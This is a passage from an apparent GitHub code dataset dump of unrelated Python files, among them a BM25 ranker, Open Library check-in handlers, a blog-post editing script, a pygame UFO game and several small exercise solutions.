\"\"\"\n Ranking a list of document by BM25 scoring\n\n Args:\n keywords: String -> query contents\n docid_list: List -> a list of document id\n returnScore: Bool -> return the scoring rather than sorting the docid_list\n\n Returns:\n docid_list: List -> a list of document id sorted based on BM25 scheme\n bm25score_list(optional): List -> a list of BM25 scoring, the list will not be ranked if this is returned\n \"\"\"\n term_list = keywords\n bm25score_list = []\n for docid in docid_list:\n sum_of_bm25 = 0\n for term in term_list:\n sum_of_bm25 += self.bm25(Util.to_lowercase(term), docid)\n sum_of_bm25 += self.bm25(Util.stem_data(term), docid)\n bm25score_list.append(sum_of_bm25)\n if returnScore:\n return docid_list, bm25score_list\n return [x for _, x in sorted(zip(bm25score_list, docid_list), reverse=True)]\n","repo_name":"pokaleo/Movie-Index","sub_path":"Code/Backend/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":25619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11889518387","text":"class Calculator:\n\n # self is only for local scope self.num\n # Class name is for global scope Calculator.num or self.num\n\n num = 100\n\n def __init__(self, a, b): # To create a constructor\n self.firstNumber = a\n self.secondNumber = b\n print(\"Constructor Triggered\")\n\n def add(self):\n print(\"I'm not executing a method inside a class\")\n\n def subtract(self):\n var = (self.firstNumber - self.secondNumber) * self.num\n # var = (self.firstNumber - self.secondNumber) * Calculator.num\n return var\n\nobj = Calculator(5, 3) # instantiate an object\nobj.add()\nprint(obj.subtract())\nprint(obj.num)\n","repo_name":"abhmora1011/PythonSelenium","sub_path":"PythonBasics/ObjectOrientedProgramming.py","file_name":"ObjectOrientedProgramming.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28226875688","text":"import cherrypy\nimport re, json\nfrom food_library import _food_database\n\nclass FoodController(object):\n\n def __init__(self, fdb=None):\n if fdb is None:\n self.fdb = _food_database()\n else:\n self.fdb = fdb\n\n self.fdb.load_food('food_data.json') # Load in the JSON data provided on initialization\n\n # Modify and Get our data from the server and send to client requesting\n def GET_KEY(self):\n output = {'result' : 'success'}\n output['foods'] = []\n\n try:\n foods = self.fdb.get_foods()\n output['foods'].append(foods)\n except Exception as ex:\n output['result'] = 'error'\n output['message'] = str(ex)\n\n return json.dumps(output)\n","repo_name":"mmetzge8/OmbreFoodNutritionAPI","sub_path":"WebServer/FoodController.py","file_name":"FoodController.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41570249555","text":"import sys\ninput = sys.stdin.readline\nimport heapq\n\nn, m, r = map(int, input().rstrip().split()) # n : 지역 개수, m : 수색 범위, r : 길의 개수\nitems = list(map(int, input().rstrip().split()))\nitems.insert(0, 0)\nedge = [[] for _ in range(n + 1)]\nfor _ in range(r) :\n v1, v2, w = map(int, input().rstrip().split())\n edge[v1].append([v2, w])\n edge[v2].append([v1, w])\n\nmax_items = 0 # item 최대 개수 기록\nINF = sys.maxsize\n\nfor region in range(1, n + 1) :\n dist = [INF] * (n + 1)\n dist[region] = 0\n heap = []\n heapq.heappush(heap, (0, region))\n\n while heap :\n w, v = heapq.heappop(heap)\n\n if w != dist[v] : continue\n\n for nv, nw in edge[v] :\n if dist[nv] > dist[v] + nw :\n dist[nv] = dist[v] + nw\n heapq.heappush(heap, (dist[nv], nv))\n\n tmp = 0\n for i in range(1, n + 1) :\n if dist[i] <= m : tmp += items[i]\n\n if tmp > max_items : max_items = tmp\n\nprint(max_items)\n","repo_name":"zeomzzz/python-coding-test","sub_path":"BOJ/Gold/14938.py","file_name":"14938.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2470069287","text":"\"\"\"Reading log check-ins handler and services.\n\"\"\"\nimport json\nimport web\n\nfrom typing import Optional\n\nfrom infogami.utils import delegate\nfrom infogami.utils.view import public\n\nfrom openlibrary.accounts import get_current_user\nfrom openlibrary.utils import extract_numeric_id_from_olid\nfrom openlibrary.core.bookshelves_events import BookshelfEvent, BookshelvesEvents\nfrom openlibrary.utils.decorators import authorized_for\n\n\ndef make_date_string(year: int, month: Optional[int], day: Optional[int]) -> str:\n \"\"\"Creates a date string in the expected format, given the year, month, and day.\n\n Event dates can take one of three forms:\n \"YYYY\"\n \"YYYY-MM\"\n \"YYYY-MM-DD\"\n \"\"\"\n result = f'{year}'\n if month:\n result += f'-{month:02}'\n if day:\n result += f'-{day:02}'\n return result\n\n\ndef is_valid_date(year: int, month: Optional[int], day: Optional[int]) -> bool:\n \"\"\"Validates dates.\n\n Dates are considered valid if there is:\n 1. A year\n 2. A year and a month\n 3. A year, month, and day\n \"\"\"\n if not year:\n return False\n if day and not month:\n return False\n return True\n\n\n@public\ndef get_latest_read_date(work_olid: str, edition_olid: str | None) -> str | None:\n user = get_current_user()\n username = user['key'].split('/')[-1]\n\n work_id = extract_numeric_id_from_olid(work_olid)\n edition_id = extract_numeric_id_from_olid(edition_olid) if edition_olid else None\n\n result = BookshelvesEvents.get_latest_event_date(\n username, work_id, edition_id, BookshelfEvent.FINISH\n )\n return result\n\n\nclass patron_check_ins(delegate.page):\n path = r'/works/OL(\\d+)W/check-ins'\n encoding = 'json'\n\n @authorized_for('/usergroup/beta-testers')\n def POST(self, work_id):\n \"\"\"Validates data, constructs date string, and persists check-in event.\n\n Data object should have the following:\n event_type : number\n year : number\n month : number : optional\n day : number : optional\n edition_key : string : optional\n event_id : int : optional\n \"\"\"\n data = json.loads(web.data())\n\n if not self.validate_data(data):\n raise web.badrequest('Invalid date submitted')\n\n user = get_current_user()\n username = user['key'].split('/')[-1]\n\n edition_key = data.get('edition_key', None)\n edition_id = extract_numeric_id_from_olid(edition_key) if edition_key else None\n\n event_type = data.get('event_type')\n\n date_str = make_date_string(\n data.get('year', None),\n data.get('month', None),\n data.get('day', None),\n )\n\n event_id = data.get('event_id', None)\n\n if event_id:\n # update existing event\n if not BookshelvesEvents.exists(event_id):\n raise web.notfound('Check-in event unavailable for edit')\n BookshelvesEvents.update_event_date(event_id, date_str)\n else:\n # create new event\n result = BookshelvesEvents.create_event(\n username, work_id, edition_id, date_str, event_type=event_type\n )\n\n event_id = result\n\n return delegate.RawText(json.dumps({'status': 'ok', 'id': event_id}))\n\n def validate_data(self, data):\n \"\"\"Validates data submitted from check-in dialog.\"\"\"\n\n # Event type must exist:\n if 'event_type' not in data:\n return False\n\n # Date must be valid:\n if not is_valid_date(\n data.get('year', None),\n data.get('month', None),\n data.get('day', None),\n ):\n return False\n\n return True\n\n\nclass patron_check_in(delegate.page):\n path = r'/check-ins/(\\d+)'\n\n @authorized_for('/usergroup/beta-testers')\n def DELETE(self, check_in_id):\n # TODO: Check for authorization after removing authorized_for decorator\n if not BookshelvesEvents.exists(check_in_id):\n raise web.notfound('Event does not exist')\n BookshelvesEvents.delete_by_id(check_in_id)\n return web.ok()\n\n\ndef setup():\n pass\n","repo_name":"pandemic-patch/openlibrary","sub_path":"openlibrary/plugins/upstream/checkins.py","file_name":"checkins.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"27671479451","text":"from typing import List\n\n\ndef all_construct(target_str: str, word_bank: List) -> List:\n \"\"\"\n :param target_str: target string\n :param word_bank: List of words\n :return: List containing all possible ways to generate target_str using words from word_bank.\n \"\"\"\n\n if target_str == '':\n return [[]]\n\n result = []\n\n for word in word_bank:\n if target_str.startswith(word):\n # rem_string = target_str.replace(str, '')\n suffix = target_str[len(word):]\n suffix_ways = all_construct(suffix, word_bank)\n target_ways = [[word] + el for el in suffix_ways]\n result.extend(target_ways)\n return result\n\n\nif __name__ == \"__main__\":\n print(all_construct('purple', ['purp', 'p', 'ur', 'le', 'purp']))\n","repo_name":"shubhamwagh/dynamic_programming_python","sub_path":"src/recursion/all_construct.py","file_name":"all_construct.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7231420304","text":"#!/usr/bin/python3\n# encoding:utf-8\n'''\nEdit file whose name contain provide string.\n'''\n\nimport os\nimport re\nimport sys\nimport glob\nimport codecs\nimport datetime\n\n\ndef help_msg():\n \"\"\"Print help message\"\"\"\n print('''\n usage: ed.py [hotvrRa] PATTERN\n\n Edit file whose name contain provide string.\n\n positional arguments:\n PATTERN Default: Edit file with PATTERN in name\n\n optional arguments:\n -h, show this help message and exit\n o, output filename\n v, view file without change\n r, remove file with PATTERN in name\n R, rename file with PATTERN in name\n a, add file\n ''')\n\n\ndef add(argv):\n \"\"\"Add new file\"\"\"\n categories = ['法', '理', '器', '用', '杂']\n head = '---\\nlayout: {}\\n' \\\n 'title: {}\\n' \\\n 'category: {}\\n' \\\n 'date: %Y-%m-%d %H:%M:%S +0800\\n' \\\n 'create: %Y-%m-%d %H:%M:%S +0800\\n' \\\n 'tags: \\n'\\\n ' - \\n' \\\n '---\\n\\n' \\\n '- TOC\\n' \\\n '{{:toc}}'\n\n now = datetime.datetime.now()\n date = now.strftime('%Y-%m-%d')\n\n filename = '_posts' + os.path.sep + date + '-{}.md'.format('-'.join(argv))\n\n for num, category in enumerate(categories):\n print('{}: {}'.format(num, category))\n\n index = input('Please select a category[0]: ')\n\n if index != '':\n index = int(index)\n else:\n index = 0\n\n title = input('Input title: ')\n\n if not os.path.exists(filename):\n with codecs.open(filename, 'w', 'utf-8') as file_write:\n file_write.write(now.strftime(head).format('post',\n title,\n categories[index]))\n\n os.system('vim \"' + filename + '\"')\n\n\ndef determ_file(patterns, case=re.I):\n '''Determine which file to edit'''\n files = glob.glob('_posts' + os.path.sep + '*.md')\n pattern = '.*'.join(patterns)\n\n edit_files = list(filter(lambda x: re.findall(pattern, x, case), files))\n\n index = 0\n\n if len(edit_files) > 1:\n for i, filename in enumerate(edit_files):\n print('{}: {}'.format(i, filename))\n index = input('Please select a file[0]: ')\n if index != '':\n index = int(index)\n else:\n index = 0\n return '\"' + edit_files[index] + '\"'\n elif len(edit_files) == 1:\n return '\"' + edit_files[index] + '\"'\n else:\n return None\n\n\ndef main(argv):\n \"\"\"Main function\"\"\"\n if not argv or '-h' in argv:\n help_msg()\n elif argv[0] == 'a':\n add(argv[1:])\n elif argv[0] == 'r':\n file_name = determ_file(argv[1:])\n answer = input('Delete {}?[y/N] '.format(file_name))\n if answer in 'yY':\n os.remove(file_name)\n elif argv[0] == 'R':\n file_name = determ_file(argv[1:])\n answer = input('Rename {}?[y/N] '.format(file_name))\n if answer in 'yY':\n new_name = input('Input newname: ')\n new_name = file_name[:10] + '-{}.md'.format(\n new_name.replace(' ', '-'))\n os.rename(file_name, new_name)\n elif argv[0] == 'v':\n file_name = determ_file(argv[1:])\n os.system('vim -M ' + file_name)\n elif argv[0] == 'o':\n file_name = determ_file(argv[1:])\n print(file_name)\n else:\n file_name = determ_file(argv)\n if file_name is not None:\n os.system('vim ' + file_name)\n else:\n add(argv)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"zYeoman/zYeoman.github.io","sub_path":"ed.py","file_name":"ed.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"4926684888","text":"from django.core.management.base import BaseCommand\nfrom scheduling.models import Event\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n \"\"\"Expire old events\"\"\"\n\n help = \"Expires events that have already occurred\"\n requires_system_checks = False\n\n def handle(self, *args, **options):\n events = Event.objects.filter(expired=False,\n end_time__lt=datetime.now())\n self.stdout.write(self.style.SUCCESS(\n \"{} Found [{}] events.\".format(\n datetime.now().strftime('%a %d-%b-%y %H-%M-%S'),\n str(len(events)))))\n for event in events:\n event.expired = True\n event.save()\n self.stdout.write(self.style.SUCCESS(\n '{} Expired [{}] events.'.format(\n datetime.now().strftime('%a %d-%b-%y %H-%M-%S'),\n len(events))))","repo_name":"mutaku/bookit","sub_path":"bookit_django/scheduling/management/commands/expire_events.py","file_name":"expire_events.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5451310048","text":"from pages.main_page import MainPage\nfrom pages.categories_page import CategoriesPage\nfrom pages.subcategory_page import SubcategoryPage\nfrom pages.cart_page import CartPage\nimport allure\n\n\n@allure.feature(\"Check the user can add products to cart and remove them\")\ndef test_add_products_to_cart_and_remove_them(browser, test_case_2_data):\n with allure.step(\"Open main page\"):\n main_page = MainPage(browser)\n main_page.open_main_page()\n with allure.step(\"Open categories page\"):\n main_page.open_categories_page()\n\n with allure.step(\"Check categories page is displayed\"):\n categories_page = CategoriesPage(browser)\n categories_page.categories_page(test_case_2_data)\n with allure.step(\"Open subcategory_page\"):\n categories_page.open_subcategory_page()\n\n with allure.step(\"Check subcategory page is displayed\"):\n subcategory_page = SubcategoryPage(browser)\n subcategory_page.subcategory_page(test_case_2_data)\n with allure.step(\"Check the user can add a product to cart\"):\n subcategory_page.add_to_cart(test_case_2_data)\n with allure.step(\"Open cart page\"):\n subcategory_page.open_cart_page()\n\n with allure.step(\"Check cart page is displayed\"):\n cart_page = CartPage(browser)\n cart_page.cart_page(test_case_2_data)\n with allure.step(\"Check the user can add products and update the order\"):\n cart_page.add_products_and_update_order(test_case_2_data)\n with allure.step(\"Check the user can remove products from the cart\"):\n cart_page.cart_is_empty(test_case_2_data)\n","repo_name":"KseniyaLikhtarovich/project_final_auto_python","sub_path":"tests/litecart_tests/test_product_cart.py","file_name":"test_product_cart.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16767959821","text":"from math import factorial\n\ndef binomial(x, y):\n try:\n return factorial(x) / (factorial(y) * factorial(x - y))\n except ValueError:\n return 0\n\ndef pascals_triangle(number_of_rows):\n triangle = []\n \n if number_of_rows <= 0:\n return None\n else:\n for row in range(number_of_rows+1):\n triangle.append([binomial(row, column) for column in range(row+1)])\n return triangle\n\nx = int(input(\"Enter number of rows : \"))\nresult = pascals_triangle(x)\nfor i in range(0, len(result)):\n print(*result[i])","repo_name":"irvaniali79/Python_Assignments","sub_path":"Assignment_15/PascalTrainagle.py","file_name":"PascalTrainagle.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"18536575638","text":"from uuid import uuid4\nimport session\nfrom session import Session, SessionException, IRodsEnv\n\n\nclass ICommands():\n\n def __init__(self, option=None):\n pass\n\n def set_user_session(self, username=None, password=None, host=None,\n port=None, def_res=None, zone=None,\n userid=0, sess_id=None):\n homedir = \"/\" + zone + \"/home/\" + username\n userEnv = IRodsEnv(\n pk=userid,\n host=host,\n port=port,\n def_res=def_res,\n home_coll=homedir,\n cwd=homedir,\n username=username,\n zone=zone,\n auth=password,\n irods_default_hash_scheme='MD5'\n )\n if sess_id is None:\n self.session = Session(session_id=uuid4())\n self.environment = self.session.create_environment(myEnv=userEnv)\n else:\n self.session = Session(session_id=sess_id)\n if self.session.session_file_exists():\n self.environment = userEnv\n else:\n self.environment = self.session.create_environment(myEnv=userEnv)\n\n self.session.run('iinit', None, self.environment.auth)\n session.ACTIVE_SESSION = self.session\n\n\n def delete_user_session(self):\n if self.session.session_file_exists():\n self.session.delete_environment()\n\n\n def getFile(self, src_name, dest_name):\n self.session.run(\"iget\", None, '-f', src_name, dest_name)\n\n\n\n def exists(self, name):\n try:\n stdout = self.session.run(\"ils\", None, name)[0]\n return stdout != \"\"\n except SessionException:\n return False\n\n def listdir(self, path):\n stdout = self.session.run(\"ils\", None, path)[0].split(\"\\n\")\n listing = ([], [])\n directory = stdout[0][0:-1]\n directory_prefix = \" C- \" + directory + \"/\"\n for i in range(1, len(stdout)):\n if stdout[i][:len(directory_prefix)] == directory_prefix:\n dirname = stdout[i][len(directory_prefix):].strip()\n if dirname:\n listing[0].append(dirname)\n else:\n filename = stdout[i].strip()\n if filename:\n listing[1].append(filename)\n return listing\n\n def size(self, name):\n stdout = self.session.run(\"ils\", None, \"-l\", name)[0].split()\n return int(stdout[3])\n","repo_name":"hydroshare/tethys_in_docker","sub_path":"tethys_main/icommands_client/icommands.py","file_name":"icommands.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12061447205","text":"# Initial state of boxes\nboxes = {\n 0: [],\n 1: ['guitar', 'note', 'toothpaste', 'tie'],\n 2: ['wire', 'train', 'pillow', 'desert'],\n 3: ['lock', 'grass', 'plate', 'bag'],\n 4: ['starfish', 'motorcycle', 'blanket', 'beach', 'sandals'],\n 5: [],\n 6: ['jungle', 'clock'],\n 7: ['soap', 'book', 'card'],\n 8: ['river', 'sculpture', 'rain', 'skirt', 'mountain'],\n 9: ['necklace', 'pants', 'dice', 'rocket', 'helmet']\n}\n\n# Empty Box 1.\nboxes[1] = []\n\n# Replace the desert and the train with the magnet and the usb in Box 2.\nboxes[2].remove('desert')\nboxes[2].remove('train')\nboxes[2].append('magnet')\nboxes[2].append('usb')\n\n# Replace the pants and the helmet with the skirt and the lightning in Box 9.\nboxes[9].remove('pants')\nboxes[9].remove('helmet')\nboxes[9].append('skirt')\nboxes[9].append('lightning')\n\n# Replace the clock with the leaf in Box 6.\nboxes[6].remove('clock')\nboxes[6].append('leaf')\n\n# Move the magnet and the pillow from Box 2 to Box 8.\nitems_to_move = ['magnet', 'pillow']\nfor item in items_to_move:\n boxes[2].remove(item)\n boxes[8].append(item)\n\n# Put the headphone and the glasses into Box 8.\nboxes[8].append('headphone')\nboxes[8].append('glasses')\n\n# Empty Box 2.\nboxes[2] = []\n\n# Move the leaf from Box 6 to Box 9.\nboxes[6].remove('leaf')\nboxes[9].append('leaf')\n\n# Put the ocean and the comb into Box 6.\nboxes[6].append('ocean')\nboxes[6].append('comb')\n\n# Replace the comb and the ocean and the jungle with the cloud and the note and the makeup in Box 6.\nboxes[6].remove('comb')\nboxes[6].remove('ocean')\nboxes[6].remove('jungle')\nboxes[6].append('cloud')\nboxes[6].append('note')\nboxes[6].append('makeup')\n\n# Move the dice from Box 9 to Box 8.\nboxes[9].remove('dice')\nboxes[8].append('dice')\n\n# Remove the note and the cloud and the makeup from Box 6.\nboxes[6].remove('note')\nboxes[6].remove('cloud')\nboxes[6].remove('makeup')\n\n# Put the guitar and the helmet and the bracelet into Box 6.\nboxes[6].append('guitar')\nboxes[6].append('helmet')\nboxes[6].append('bracelet')\n\n# Move the bracelet and the helmet and the guitar from Box 6 to Box 2.\nitems_to_move = ['bracelet', 'helmet', 'guitar']\nfor item in items_to_move:\n boxes[6].remove(item)\n boxes[2].append(item)\n\n# Empty Box 8.\nboxes[8] = []\n\n# Print the boxes\nfor box_number, items in boxes.items():\n print(f\"Box {box_number}: {items}\")","repo_name":"NLP-KU/fulgid","sub_path":"boxes/results/complex-boxes-dataset/code/gpt-3.5-turbo/1d0953ab10.py","file_name":"1d0953ab10.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73574609715","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\n\n\n# In[3]:\n\n\nimport pandas as pd\n\n\n# In[4]:\n\n\nimport json\nimport sys\n\n\n# import argparse\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"-fn\", dest=\"filePath\", type=str, required=True)\n# args = parser.parse_args()\n\n# In[5]:\n\n\n# filePath = '../../labeled_document2.json'\n\n\n# In[6]:\n\nwith open(sys.argv[1]) as f:\n data = json.load(f)\n\nwith open(sys.argv[2]) as f:\n data_iter2 = json.load(f)\n\n\n# In[10]:\n\n\nnegativeComment = None\npositiveComment = None\nfor i in range(len(data['Comment'])):\n if data['CommentLabel'][i] == 0:\n negativeComment = np.array([[data['Comment'][i],0]]) if negativeComment is None else np.append(negativeComment,[[data['Comment'][i],0]],0)\n else:\n positiveComment = np.array([[data['Comment'][i],1]]) if positiveComment is None else np.append(positiveComment,[[data['Comment'][i],1]],0)\n\n\nfor i in range(len(data_iter2['Comment'])):\n if data_iter2['CommentLabel'][i] == 0:\n negativeComment = np.append(negativeComment,[[data_iter2['Comment'][i],0]],0)\n else:\n positiveComment = np.append(positiveComment,[[data_iter2['Comment'][i],1]],0)\n\n\n# In[11]:\nindexes = np.random.choice(positiveComment.shape[0],negativeComment.shape[0],replace=False)\n\nconcatComment = np.concatenate((positiveComment[indexes],negativeComment),axis=0)\n# concatComment = np.concatenate((positiveComment,negativeComment),axis=0)\n\n# print (len(positiveComment) + len(negativeComment))\ndataframe = pd.DataFrame(concatComment)\ndataframe.to_csv('./labeled_comments.csv',header=False,index=False)\n","repo_name":"alanzhang88/SONegativeCommentDetection","sub_path":"models/CNN/embeddings/convertJsontoCSV.py","file_name":"convertJsontoCSV.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"4652727218","text":"import pygame\nimport random\nfrom sprites import Missile\nfrom sprites import UFO\nfrom sprites import Beam\nfrom sprites import Human\nfrom sprites import House\nfrom sprites import Building\n\n# game play mode\nclass Game(object):\n \n# loads the images needed for game\n def images(self):\n self.heart = pygame.image.load('images/Heart.png').convert_alpha()\n self.heart = pygame.transform.scale(self.heart,(30,30))\n self.explode=pygame.image.load('images/explosion.png').convert_alpha()\n self.explode=pygame.transform.scale(self.explode,(80,80))\n\n# loads the sounds needed for game \n def sounds(self):\n self.explosion=pygame.mixer.Sound('sound/explosion.ogg')\n self.gameover=pygame.mixer.Sound('sound/gameover.wav')\n self.gameclear=pygame.mixer.Sound('sound/gameclear.wav')\n self.beamSound=pygame.mixer.Sound('sound/ufo.wav')\n self.beamSound.set_volume(0.2)\n self.pickUp=pygame.mixer.Sound('sound/score.wav')\n \n def __init__(self,highScore):\n self.images()\n self.sounds()\n self.player=UFO(3)\n self.gauge=0\n self.score=0\n self.ufoSize=80\n self.highScore=highScore\n self.font=pygame.font.SysFont(\"Comic Sans MS\", 50)\n self.miniFont=pygame.font.SysFont(\"Comic Sans MS\", 25)\n self.life=self.font.render(\"LIFE\", False, (0, 0, 0))\n self.largeFont=pygame.font.SysFont(\"Comic Sans MS\", 140)\n self.text=self.largeFont.render(\"PAUSED\",False,(0,0,0))\n self.textCoords=(100,150)\n self._keys = dict()\n self.gameOver=False\n self.gameClear=False\n self.pause=False\n self.detectP=False\n self.time=0\n self.drawBeam=False\n self.number=0\n self.missileList=pygame.sprite.Group()\n self.humans=pygame.sprite.Group()\n self.houses=pygame.sprite.Group()\n self.buildings=pygame.sprite.Group()\n self.beam=Beam()\n\n# plays bgm\n def playMusic(self):\n pygame.mixer.music.load('sound/gameBGM.ogg')\n pygame.mixer.music.play(-1)\n\n# when called, generates a missile at a random location and adds to sprite group\n def spawnMissiles(self):\n direction=random.randint(0,1)\n yCoord=random.randint(120,290)\n spawn=Missile(yCoord,direction)\n self.missileList.add(spawn)\n\n# generates targets on screen when game starts \n def setScreen(self):\n if self.time==0:\n for i in range(0,10):\n number=random.randint(1,30)*20\n which=random.randint(1,60)\n person=Human(number,self.player)\n house=House(number,self.player)\n building=Building(number,self.player)\n if which>=30:\n self.humans.add(person)\n elif which>=10 and which<30:\n self.houses.add(house)\n else:\n self.buildings.add(building)\n \n# when called, generates targets at random timings and adds to sprite group\n def spawnTargets(self):\n number=random.randint(1,500)\n if number<200:\n person=Human(600,self.player)\n self.humans.add(person)\n if number<300 and number>200:\n house=House(600,self.player)\n self.houses.add(house)\n if number>450:\n building=Building(600,self.player)\n self.buildings.add(building)\n \n# checks keys pressed and lifted in order to control ufo and beam \n def keys(self):\n if self.pause:\n keys=pygame.key.get_pressed()\n if keys[pygame.K_p]:\n if self.detectP==False:\n if self.pause==False:\n pygame.mixer.music.pause()\n self.pause=True\n else:\n pygame.mixer.music.unpause()\n self.pause=False\n self.detectP=True\n if not keys[pygame.K_p]:\n self.detectP=False\n else:\n keys=pygame.key.get_pressed()\n self.speed=5\n if keys[pygame.K_SPACE]:\n if self.player.invincible==False:\n pygame.mixer.Channel(0).play(self.beamSound,loops=-1)\n self.drawBeam=True\n if self.drawBeam:\n self.speed=2\n if keys[pygame.K_UP]:\n if self.player.y>65:\n self.player.update(y=-self.speed)\n self.beam.update(y=-self.speed)\n if keys[pygame.K_DOWN]:\n if (self.player.y+self.ufoSize)<300:\n self.player.update(y=self.speed)\n self.beam.update(y=self.speed)\n if keys[pygame.K_RIGHT]:\n if (self.player.x+self.ufoSize)<600:\n self.player.update(x=self.speed)\n self.beam.update(x=self.speed)\n if keys[pygame.K_LEFT]:\n if self.player.x>0:\n self.player.update(x=-self.speed)\n self.beam.update(x=-self.speed)\n if not keys[pygame.K_SPACE]:\n self.beamSound.stop()\n if keys[pygame.K_p]:\n if self.detectP==False:\n if self.pause==False:\n self.beamSound.stop()\n pygame.mixer.music.pause()\n self.pause=True\n else:\n pygame.mixer.music.unpause()\n self.pause=False\n self.detectP=True\n if not keys[pygame.K_p]:\n self.detectP=False\n\n# controls everything dependent on time, including updating sprites and spawning\n def timerFired(self, dt):\n if self.pause:\n pass\n else:\n self.setScreen()\n self.missileList.explosion=False\n self.drawBeam=False\n self.time+=1\n self.number=random.randint(1,10)\n self.keys()\n if self.player.livesLeft<=0:\n self.gameover.play()\n self.gameOver=True\n return\n if self.time%100==0:\n if self.number>3:\n self.spawnMissiles()\n if self.time%30==0:\n self.spawnTargets()\n self.missileList.update(self.player,self.beam,self.explosion,\\\n self.time)\n if self.time%2==0:\n self.humans.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.houses.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.buildings.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.score=self.player.score\n self.gauge=self.player.gauge\n if self.score>self.highScore:\n self.highScore=self.score\n if self.gauge==400:\n self.gameclear.play()\n self.score+=(self.player.livesLeft*500)\n if self.score>self.highScore:\n self.highScore=self.score\n self.gameClear=True\n if self.player.killed!=0 and self.time<(self.player.killed+45) and \\\n self.time>self.player.killed:\n self.beamSound.stop()\n self.player.invincible=True\n else:\n self.player.invincible=False\n \n# draws the hearts/lives on the screen\n def drawLife(self,screen):\n if self.player.livesLeft>2:\n screen.blit(self.heart,(180,10))\n if self.player.livesLeft>1:\n screen.blit(self.heart,(140,10))\n if self.player.livesLeft>0:\n screen.blit(self.heart,(100,10))\n \n def getEvent(self):\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n pass\n\n# draws the game screen \n def redrawAll(self, screen):\n self.scoreText=self.miniFont.render\\\n (\"SCORE %d\" % self.score,False,(0,0,0))\n self.highScoreText=self.miniFont.render\\\n (\"HIGH SCORE %d\" % self.highScore,False,(0,0,0))\n screen.fill((255,255,255))\n if self.player.invincible==False:\n screen.blit(self.player.image,self.player.rect)\n else:\n if self.player.killed!=0 and self.time<(self.player.killed+10)\\\n and self.time>self.player.killed:\n screen.blit(self.explode,(self.player.x,self.player.y))\n if self.time%5==0:\n screen.blit(self.player.image,self.player.rect)\n screen.blit(self.life,(10,10))\n screen.blit(self.scoreText,(400,30))\n screen.blit(self.highScoreText,(400,10))\n pygame.draw.rect(screen,(0,0,0),(0,390,600,10))\n pygame.draw.rect(screen,(0,0,0),(100,70,400,20),2)\n pygame.draw.rect(screen,(0,0,0),(100,70,self.gauge,20))\n self.drawLife(screen)\n self.buildings.draw(screen)\n self.houses.draw(screen)\n self.humans.draw(screen)\n self.missileList.draw(screen)\n if self.drawBeam:\n pygame.draw.lines(screen,(0,0,0),False,\\\n [(self.player.x+self.ufoSize,self.player.y+self.ufoSize),\\\n (self.player.x+self.ufoSize+30,\\\n self.player.y+self.ufoSize+190)],4)\n pygame.draw.lines(screen,(0,0,0),False,\\\n [(self.player.x-30,self.player.y+self.ufoSize+190),\\\n (self.player.x,self.player.y+self.ufoSize)],4)\n if self.pause:\n screen.blit(self.text,(self.textCoords))\n\n ","repo_name":"hirokoa9/Term-Project","sub_path":"gamePlay.py","file_name":"gamePlay.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70047042355","text":"import time\r\n\r\n\r\nclass Solution:\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n if not emails:\r\n return 0\r\n addrs = set()\r\n for email in emails:\r\n addr = email.split('@')\r\n local_name = addr[0].split('+')\r\n local_name = local_name[0].replace('.', '')\r\n addrs.add(local_name + '@' + addr[-1])\r\n return len(addrs)\r\n\r\n\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n if not emails:\r\n return 0\r\n \r\n accounts = set()\r\n for email in emails:\r\n account, domain = email.split('@')\r\n idx = account.find('+')\r\n if -1 != idx:\r\n account = account[:idx]\r\n account = account.replace('.', '')\r\n accounts.add(account + '@' + domain)\r\n\r\n return len(accounts)\r\n\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n kinds = set()\r\n for email in emails:\r\n local, domain = email.split('@')\r\n idx = local.find('+')\r\n if -1 != idx:\r\n local = local[:idx]\r\n local = local.replace('.', '')\r\n kinds.add(local + '@' + domain)\r\n\r\n return len(kinds)\r\n\r\n\r\nstime = time.time()\r\n#print(2 == 